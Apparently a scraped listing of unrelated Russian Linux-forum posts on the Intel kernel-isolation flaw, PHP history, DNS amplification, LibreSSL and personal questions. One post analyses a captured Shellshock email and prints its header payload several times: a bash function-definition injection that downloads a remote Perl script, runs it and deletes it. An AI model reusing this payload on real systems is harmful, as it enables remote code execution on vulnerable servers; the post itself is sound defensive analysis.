Ошибка проектирования всех процессоров Intel, выпущенных за последние 10 лет, заставила разработчиков Linux и Windows в срочном порядке перерабатывать схему разделения адресных пространств ядра и пользователя, брешь в которой вызвана этой ошибкой. По известным сейчас данным, переработка требует модификации критических частей ядра и приводит к падению производительности приложений от 5 до 30% (чипы Intel 2010 года и новее имеют в своём арсенале возможности, чтобы сократить это падение).

Суть уязвимости, скорее всего, заключается в том, что спекулятивное исполнение кода косвенно нарушает контроль доступа, и это позволяет приложению «видеть» содержимое защищенного адресного пространства ядра (раннее описание). Детали уязвимости находятся под эмбарго до выпуска исправлений, который намечается на середину января 2018, когда выйдет новое ядро Linux и ежемесячное обновление безопасности для Windows.

Для решения проблемы разработчикам ядер пришлось полностью разделить память ядра и память пользовательских процессов, однако такое решение приводит к серьёзному падению производительности из-за необходимости сброса части кэша транслированных виртуальных адресов (TLB) при входе в ядро.

Разработчики ядра Линукса в шутку предлагали следующие аббревиатуры для новой модели разделения памяти ядра и пользовательских процессов: User Address Separation (*_uass) и Forcefully Unmap Complete Kernel With Interrupt Trampolines (fuckwit_*), однако остановились на Kernel Page Table Isolation (kpti_*).

Компания AMD утверждает, что её процессоры уязвимости не подвержены.

Обсуждение патча на LWN, с результатами тестов.

Общие подробности от издания The Register

>>> Технические подробности, демонстрационный код PoC

Хорошо и счастливо работается только тогда, когда работа заливает сознание. Я люблю писать по ночам, потому что ночью теряется рассеивающее ощущение движения времени. Днем только в самых редких случаях удается достигнуть этой окаменелости, глубокого безразличия к окружающему. День весь расчленен; он измеряется и управляется дробными величинами часов; причем каждый час имеет свою характеристику, настойчиво поддерживающую дробление. Одни часы ассоциативно связаны с профессиональными обязанностями, другие — с обедом (это сильное членение, дающее особую окраску часам предобеденным и послеобеденным), иные — с отдыхом. Словом, день очень заземлен, его этапы предназначены регулировать суету и не способствуют высокому оцепенению. Дневные часы наказывают нас отвратительным ощущением бестолковости, если мы нарушаем и смешиваем их функции; два часа дня и четыре часа — очень разные вещи. Два часа и четыре часа ночи — почти одно и то же. Все ночные часы в равной мере предназначены для сна; сон же представляется нам скорее потребностью, чем обязанностью. Пересилив эту потребность, мы чувствуем себя вправе искажать лицо ночи по нашему усмотрению. Ночные часы лишены индивидуальных признаков. Время не продвигается толчками, но сливается в поток, протекание которого неощутимо.

Человек за письменным столом слышит, как пульсирует кровь в его висках, разгоряченных работой. Он смотрит непонимающими глазами на циферблат, по которому без определенной цели движется часовая стрелка, до самого утра не имеющая власти над человеком.

Наверняка кому-нить в голову приходила мысль воссоздать Fido , может кто кинет ссылкой почитать какие-нить разумные (технически) идеи в этом ключе?

Основная цель - альтернативный традиционному , способ передачи почты.

Мне видется мысль так - как в старом фидо , есть поинты есть ноды . Поинт получатель почты, ноды собиратели и распространители . Среда передачи - вайфай, блютус, УКВ и прочие .

Хотите ли вы эмигрировать из свой страны? Если да, на что вы обратите наибольшее внимание?

Для определенности предположим, что у вас есть оффер в заграницу на интересную позицию и «хорошую» по меркам той страны зарплату, деньги на переезд и виза.

Вопрос, конечно, в первую очередь к гражданам тракторообразующих стран.

Почему у нас обязательным критерием успешности человека является наличие у него жены (а то и детей)? Почему всегда считается, что, если человек не женат, то единственная причина — никто не соглашается на нём жениться?

Здравствуйте, мои дорогие любители и профессионалы web-технологий. Лично у меня бомбит от сайтов с «бесконечной прокруткой». В основном от невозможности дать ссылку необходимую страницу и тормозов, которые начинает ловить браузер на 10-20-й странице при большинстве реализаций. А так же от лэндингов с плавной промоткой гиганской страницы с кучей прыгающего и мельтешащего габрища.

А что тебя раздражает в web-инновациях, узернэйм?

!Ъ: (осторожно, маты) http://pastebin.com/7xs5E7hb

Ъ: По ссылке - судя по всему, мини-интервью с одним из работников Yandex. Версии для ленивых пользователей ЛОРа не будет, ибо передать колорит без мата не выйдет. Enjoy

Президент Фонда Свободного ПО Ричард Столлман ответил на вопросы пользователей портала Slashdot. Ниже предлагается вольный дилетантский перевод некоторых наиболее интересных ответов.

( читать дальше... )

>>> Полная версия интервью (англ.)

Я опять немного выпил и вот подумал...

Вроде как надо поступать в институт, влезать в ипотечное рабство (ибо иначе, по нынешним ценам, хрен получишь крышу над головой) и делать ещё кучу не особо приятных вещей, чтобы просто жить.
А ЗАЧЕМ всё это терпеть и просто всё не прекратить? Ну помимо инстинкта самосохранения.

Так зачем же ты живёшь и терпишь кучу плохих вещей, линуксоид? Речь не о каком-то глобальном «смысле жизни», коего, по моему мнению, и нет, а именно о вашей, личной, причине жить дальше и бороться. Том, что вас толкает вперёд.

Линукс здесь при том, что данная ОС, как правило, осознанный выбор людей, которые способны сравнивать и открывать для себя новые варианты, а не просто плыть по течению - и мнение таких людей, как раз, и является интересным.

Именно в этот день, 8 июня 1995 года, Расмус Лердорф открыл исходный код PHP Tools общественности.

Созданное в 1994 году Расмусом Лердорфом, самое первое воплощение PHP было простым набором CGI-скриптов, написанных на языке программирования Си.

Первой версией PHP, напоминающей тот язык, каким мы знаем его сегодня, была версия 3.0. Примерно после девяти месяцев публичного тестирования, при объявлении официального выпуска PHP 3.0, он уже был установлен на более чем 70000 доменах по всему миру. На пике своего развития PHP 3.0 был установлен приблизительно на 10% веб-серверов в Интернете.

PHP 4.0, основанный на новом движке «Zend Engine», официально вышел в мае 2000 года. Кроме значительного улучшения производительности, PHP 4.0 получил ещё несколько ключевых нововведений, таких как поддержка намного большего числа веб-серверов, поддержка HTTP сессий, буферизация вывода, более безопасные способы обработки вводимой пользователем информации и несколько новых языковых конструкций.

В июле 2004 был выпущен PHP 5 с обновлённым движком «Zend Engine 2.0», новой объектной моделью и множеством других нововведений. Версия 5.3 порадовала пользователей пространствами имён, поздним статическим связыванием и замыканиями.

В 2009 году появилась группа совместимости фреймворков (PHP-FIG), которая начала благородную миссию по стандартизации совместимости PHP-проектов. Большинство PHP-библиотек и фреймворков начали адаптацию под рекомендации, предложенные или одобренные группой совместимости фреймворков (PSR).

В апреле 2011 началась работа над менеджером зависимостей Composer, который должен прийти на замену устаревшему PEAR.

Новая значительная версия PHP 5.4 была выпущена в марте 2012. С выпуском этой версии PHP получил заметные улучшения производительности, новые функции включают трейты, короткий синтаксис массивов, встроенный веб-сервер для тестирования и многое другое.

С приходом версии 5.5 в PHP появились генераторы и сопрограммы, ключевое слово finally, упрощенное API для хеширования паролей и множество других новых функций.

Несмотря на наличие обширной документации, первоначальный черновик спецификации был анонсирован только в 2014 году.

А в августе этого же года вышла стабильная значительная версия PHP 5.6. Новые функции включают скалярные выражения в константах, функции с переменным числом аргументов при помощи оператора ..., оператор возведения в степень **, импорт функций и констант при помощи ключевого слова use и многое другое.

Уже осенью этого года состоится выпуск PHP 7, который включит революционные для этого языка изменения.

>>> Подробности

Давным-давно, когда у меня только появился компьютер и я начинал учиться программировать было очень сложно найти хоть какой-то хелп. Книги по программированию почти не продавались. У меня была только одна по с++, тоненькая, зеленая. На первой странице было рассказано про массивы, на второй про указатели. Для школьника, который в первый раз открыл редактор и хочет написать программу, это как-то слишком уж. Спросить тоже было не у кого: родители не программировали, учителей информатики в школе нет, круг общения сводился к друзьям из двора (копьютерами увлекалось совсем немного). Поэтому приходилось разбираться очень детально, обычно самому.

(Настоящий программист никогда ничего не документирует  — пользователь возьмет от его программы только то, на что у него хватит мозгов — цитата из правил настоящего программиста того времени // юмор такой был)

Потом был кружок программирования во дворце пионеров. Это было круто. Там я научился писать маленькие программы, правда на паскале, но тем не менее.

Потом появился модем и информации стало больше — можно было звонить на ббски и тянуть оттуда книги. Потом появились диски на радио-рынках с кучей книг, хелпов, msdn, хауту и пр.пр.пр. Это было здорово. Было даже так, что я покупал диски по рулетке: они лежали в больших ящиках, отсортированные по тематике, и можно было купить 10см, 20см, метр. Просто придти с рулеткой, отмерить и сказать: мне метр вот из этого ящика. Дома посмотрю...

Потом появился интернет и стало доступно почти все. Любые книги. Любые сообщества — теперь можно было спрашивать не только у товаришей со двора, но у ребят со всего мира. Мы стали купаться в информации. Ее стало немеренно. Все что угодно. Это чудо.

Вузы продолжали выпускать специалистов. Софта еще особо не было. Поэтому математик, физик, химик, инженер,... вне зависимости от специализации был программистом. Им всем нужно было делать расчеты, настраивать компьютеры, автоматизировать работу...

Постепенно софт развился. Стал доступным (в т.ч. и бесплатным). И теперь программирование не нужно ни физику, ни математику, ни инженеру. Все делают программы. Можно даже ничего не писать, только мышкой водить. Статистические пакеты, системы моделирования динамики жидкостей и газов, моделирование хим.реакторов...

Теперь программирование нужно только программистам. Хотя казалось бы, что их выпуск должен был только расти, а он в итоге резко упал, ибо физик, математик, химик, инженер... больше не программист.

Но самое печальное это то, что если раньше человек осваивал С++, то он осваивал программирование. А если сегодня, то он освоил только С++. Потому что ему уже не нужно разбираться. Он может загуглить или спросить как реализовать ту или иную фичу и тупо скопипастить код себе в программу. Особый цинизм это приобрело в PHP и Javascript.

При этом бизнес на законченные решения в России не перестроился (например, если ему нужен статистик, то ему нужен обычно программист-статистик, и т.п.).

Пришло поколение копипаст-программистов.

Недавними тредами навеяно.

А как вообще развить культуру еды и научится норм готовить?
Я привыкший к фаст фуду не сильно различаю еду и порой могу есть полусырое мясо не замечая, как развить этот скилл?

И что важней, как вообще придумывать что готовить? Вообще идей нету обычно, а сидеть 3 часа придумывать не круто.

Кто-нибудь разбирался с этим вопросом?

Есть хорошая статья в части первой - по теориии - http://blogerator.ru/page/dns-amplification-ddos-anatomija-ataki-otrazhenie-p...
в части второй - по практике - http://blogerator.ru/page/dns-amplification-ddos-otrazhenie-bind-dns-reflect-...

Там советуют отлючить рекурсивные запросы:
recursion no;

У меня и у клиентов - динамические адреса в разных сетях, поэтому меня такой приём не очень устраивает и совсем не радует*.

Есть сервис, который проверяет bind через on-line тест https://isc.sans.edu//dnstest.html и там же предлагают настройки http://www.cymru.com/Documents/secure-bind-template.html, но я их еще не разбирал...

Кто-нибудь уже сталкивался с тюнингом конфигов bind для борьбы с усилением DNS?
_____
* в том смысле, чтобы оставить рекурсию только для определенных IP через recursion allow - я так не имею возможности сделать.

Несколько дней назад обнаружил письмо, в котором явно делалась попытка проэксплуатировать недавнюю уязвимость в bash. По видимому, атака рассчитана на работу фильтров, в качестве которых могут быть shell скрипты.

Исходный вид письма:

From - Fri Oct 24 20:38:48 2014
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <support@mata.com>
Delivered-To: my.user.name@my.domain.name.net
Received: by mail.my.domain.name.net (Postfix)
        id 1B8E6306033C; Fri, 24 Oct 2014 20:38:44 +0400 (MSK)
Delivered-To: root@mail.my.domain.name.net
Received: by mail.my.domain.name.net (Postfix, from userid 1001)
        id 055493060D8A; Fri, 24 Oct 2014 20:38:43 +0400 (MSK)
Received: from sub.domain.my.domain.name.net (unknown [11.22.33.44])
        by mail.my.domain.name.net (Postfix) with ESMTP id D3496306033C
        for <root@mail.my.domain.name.net>; Fri, 24 Oct 2014 20:38:43 +0400 (MSK)
Received: from USER (u16850951.onlinehome-server.com [74.208.184.251])
        by sub.domain.my.domain.name.net (8.14.4/8.14.4/Debian-2ubuntu2) with SMTP id s9OGPr2d018507
        for <root@localhost>; Fri, 24 Oct 2014 20:25:55 +0400
Resent-Message-Id: <201410241625.s9OGPr2d018507@sub.domain.my.domain.name.net>
To: () {:;;};cd/tmp;curl.-sO.178.254.31.165/ex.txt;lwp-download.http: //178.254.31.165/ex.txt@mail.my.domain.name.net;,
        wget.178.254.31.165/ex.txt@mail.my.domain.name.net;,
        fetch.178.254.31.165/ex.txt@mail.my.domain.name.net;,
        perl.ex.txt@mail.my.domain.name.net;,
        rm.-fr.ex.*@mail.my.domain.name.net;;;;;;;;
References:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Cc: () {:;;};cd/tmp;curl.-sO.178.254.31.165/ex.txt;lwp-download.http: //178.254.31.165/ex.txt@mail.my.domain.name.net;,
        wget.178.254.31.165/ex.txt@mail.my.domain.name.net;,
        fetch.178.254.31.165/ex.txt@mail.my.domain.name.net;,
        perl.ex.txt@mail.my.domain.name.net;,
        rm.-fr.ex.*@mail.my.domain.name.net;;;;;;;;
From: () {:;;};cd/tmp;curl.-sO.178.254.31.165/ex.txt;lwp-download.http: //178.254.31.165/ex.txt@mail.my.domain.name.net;,
        wget.178.254.31.165/ex.txt@mail.my.domain.name.net;,
        fetch.178.254.31.165/ex.txt@mail.my.domain.name.net;,
        perl.ex.txt@mail.my.domain.name.net;,
        rm.-fr.ex.*@mail.my.domain.name.net;;;;;;;;
Subject:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Date:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Message-ID:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Comments:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Keywords:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Resent-Date:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Resent-From: () {:;;};cd/tmp;curl.-sO.178.254.31.165/ex.txt;lwp-download.http: //178.254.31.165/ex.txt@mail.my.domain.name.net;,
        wget.178.254.31.165/ex.txt@mail.my.domain.name.net;,
        fetch.178.254.31.165/ex.txt@mail.my.domain.name.net;,
        perl.ex.txt@mail.my.domain.name.net;,
        rm.-fr.ex.*@mail.my.domain.name.net;;;;;;;;

В более удобочитаемом виде:

Return-Path: <support@mata.com>
Delivered-To: my.user.name@my.domain.name.net
Received: 
        by mail.my.domain.name.net (Postfix)
        id 1B8E6306033C; 
        Fri, 24 Oct 2014 20:38:44 +0400 (MSK)

Delivered-To: root@mail.my.domain.name.net
Received: 
        by mail.my.domain.name.net (Postfix, from userid 1001)
        id 055493060D8A; 
        Fri, 24 Oct 2014 20:38:43 +0400 (MSK)

Received: 
        from sub.domain.my.domain.name.net (unknown [11.22.33.44])
        by mail.my.domain.name.net (Postfix) with ESMTP 
        id D3496306033C
        for <root@mail.my.domain.name.net>; 
        Fri, 24 Oct 2014 20:38:43 +0400 (MSK)

Received: 
        from USER (u16850951.onlinehome-server.com [74.208.184.251])
        by sub.domain.my.domain.name.net (8.14.4/8.14.4/Debian-2ubuntu2) with SMTP 
        id s9OGPr2d018507
        for <root@localhost>; 
        Fri, 24 Oct 2014 20:25:55 +0400
Resent-Message-Id: <201410241625.s9OGPr2d018507@sub.domain.my.domain.name.net>

Здесь мы можем видеть малоинформативный support@mata.com и не намного более информативный u16850951.onlinehome-server.com [74.208.184.251], с которого было отправлено письмо.

Заголовки:

To:
From:
Resent-From:

содержат следующее:

To: () {:;;};
        cd/tmp;
        curl.-sO.178.254.31.165/ex.txt;
        lwp-download.http: //178.254.31.165/ex.txt@mail.my.domain.name.net;,
        wget.178.254.31.165/ex.txt@mail.my.domain.name.net;,
        fetch.178.254.31.165/ex.txt@mail.my.domain.name.net;,
        perl.ex.txt@mail.my.domain.name.net;,
        rm.-fr.ex.*@mail.my.domain.name.net;;;;;;;;

Здесь мы можем видеть 178.254.31.165/ на котором файла ex.txt конечно уже не было.

Заголовки:

References:
Subject:
Date:
Message-ID:
Comments:
Keywords:
Resent-Date:

содержат предыдущий случай, без добавленного к url домена:

References:() { :; }; 
        cd /tmp ;
        curl -sO 178.254.31.165/ex.txt;
        lwp-download http://178.254.31.165/ex.txt;
        wget 178.254.31.165/ex.txt;
        fetch 178.254.31.165/ex.txt;
        perl ex.txt;
        rm -fr ex.*;

Перемещено beastie из admin

Вышла новая версия машинного переводчика «Правда» 1.0.0.

Список изменений по сравнению с предыдущей версией:

• Интерфейс полностью переделан и заменён на Qt-шный.
• Язык описания грамматики теперь не использует грамматики Хомского, он полностью переписан с учетом новых возможностей языка.
• Переработан алгоритм.
• Программа начала (относительно осмысленно) выбирать перевод слова из нескольких вариантов.
• Появился IDE для лингвиста.
• Появилась версия под MS Windows.

>>> Подробности

Потеряв много времени на ненужное образование, проблемы со здоровьем и прочую ерунду, сейчас я пришёл к тому, что мне надо очень быстро вырасти в профессиональном плане. Мутировать в приличного прогаммера я уже никак не успею, остаётся дальше качать админа.

Умею linux и сети, ну и традиционно всё остальное по мелочи. Разве только с ERP-системами дело не имел. Если интересны подробности: тыц и тыц. Расти предполагаю в том же направлении: highload linux(интереснее) и сети(вторично).

Сейчас я ищу работу, которая позволит мне это сделать. То есть, там должны быть:

• интересные задачи по теме
• адекватный рабочий процесс, позволяющий значительную часть рабочего времени тратить на решение этих задач, а не на борьбу с пользователями/идиотизмом начальства/нереальными сроками.
• достаточно узкая специализация. То есть я занимаюсь своей областью, а не выполняю все подряд задачи, хоть как-то связанные с IT.

Последний пункт поясню подробнее. «Специалист по всему» - страшное проклятие. Во-первых, любая работа содержит много рутины и немного интересных, развивающих задач. Причём рутина, как правило, приоритетнее. Чем шире твоя область ответственности - тем больше к тебе прилетит приоритетной рутины и меньше - интересных задач. Во-вторых, в силу ограниченности времени и сил, серьёзно прокачаться в одной основной области и нескольких смежных бытрее и эффективнее, чем одновременно осваивать много малосвязанных областей. Тут где-то валялся топик с интересным флеймом на эту тему.

Живу в Воронеже, готов переехать в Нерезиновую или ещё куда поблизости, R<=500 км. В Питер не готов, тамошний климат меня убьёт.

На зарплату пофиг, лишь бы на еду хватало. Но логика подсказывает, что там, где платят мало денег, ничего интересного не делают. Да и отношение к дорогому спецу у менеджмента совсем другое, чем к дешёвому джамшуту.

sudo cast val-amart. Ты дядька серьёзный, подскажи что-нибудь умное.

З.Ы. В Talks, потому что это не объявление о поиске работы, а обсуждение пригодных для работы мест. Если модераторы не согласны, можно переносить в Job.

Выясним, почему мы всё чаще встречаем сообщения о том, что «опенсорсные багтрекеры - говно».

Выясним, почему, согласно статье Ко и Чиланы, большую часть полезных баг-репортов создаёт маленькая и организованная кучка людей.

Выясним, как сделать мир свободного ПО лучше.

Сам не пойму, чего меня тянет на подобное. Но ведь жизненный опрос, не правда ли?

В свете недавней очень серьёзной уязвимости Heartbleed протокола Heartbeat в сторонней библиотеке OpenSSL, разработчики OpenBSD решили окончательно и бесповоротно переписать всю библиотеку SSL, удалив груду разных кодов совместимости и поддержки несуществующих архитектур (например, big-endian i386/amd64), сохранив лишь API-совместимость с upstream OpenSSL.

Данное начинание некоторые временно называли OpenOpenSSL (т.к. оригинальный OpenSSL разрабатывается вне OpenBSD), но OpenBSD Foundation теперь объявило официальное название — «LibreSSL (the OpenBSD fork of OpenSSL)». Название также можно воспринимать как «lib-re-ssl» — переработка библиотеки ssl.

Что именно принудило проект OpenBSD отказаться от какого-либо сотрудничества с OpenSSL в будущем? Разработчик tedu@openbsd решил описать историю нового libressl на свежую память:

• Протокол Heartbeat никто до сих пор не использует, однако он был всегда включён с момента поддержки в OpenSSL пару лет назад, и его нельзя было выключить без перекомпиляции с OPENSSL_NO_HEARTBEATS. (Поддержка теперь была полностью удалена из OpenBSD libressl.)
• Предполагалось, что для избежания Heartbleed на OpenBSD достаточно будет установить опцию J в malloc.conf. Однако разработчики OpenSSL специально позаботились и сделали это невозможным, и поэтому даже на OpenBSD необходимо пересобирать всю библиотеку для устранения серьёзной уязвимости Heartbleed (в 5.3, 5.4 и 5.5, OpenSSL 1.0.0f в 5.2 и ранее не уязвим).
• В процессе тестирования опции J с OpenSSL была обнаружена старинная ошибка в OpenSSL, о которой уже несколько лет было известно разработчикам OpenSSL, и даже имелось очень простое исправление. Однако разработчики OpenSSL до сих пор не приняли это к сведению. Командам OpenBSD, FreeBSD и Debian пришлось исправлять ошибку без какой-либо помощи от OpenSSL. Пару недель спустя, в upstream CVE-2010-5298 до сих пор исправить не удосужились.

Так как сотрудничество с таким upstream нереально и в дальнейшем не предполагается, было принято решение улучшить читаемость всего кода в соответствии с style(9) — KNF, а также удалить весь неиспользуемый код для упрощения аудита. В будущем планируется выпуск портативной версии, после периода стабилизации.

>>> http://BXR.SU/OpenBSD/lib/libssl/src/ssl/

я встречал тут многих, которые любят бабос. Бизнес типа все такое. А вот чтобы вы лично сделали, если бы у вас было очень много денег? допустим, миллион евро.

Смогли бы вы совместить это с любимым делом (программированием, наукой, etc.), открыть какую-то контору? Или бы вы просто забили на все и начали бы зарабатывать еще больше?

Дискасс.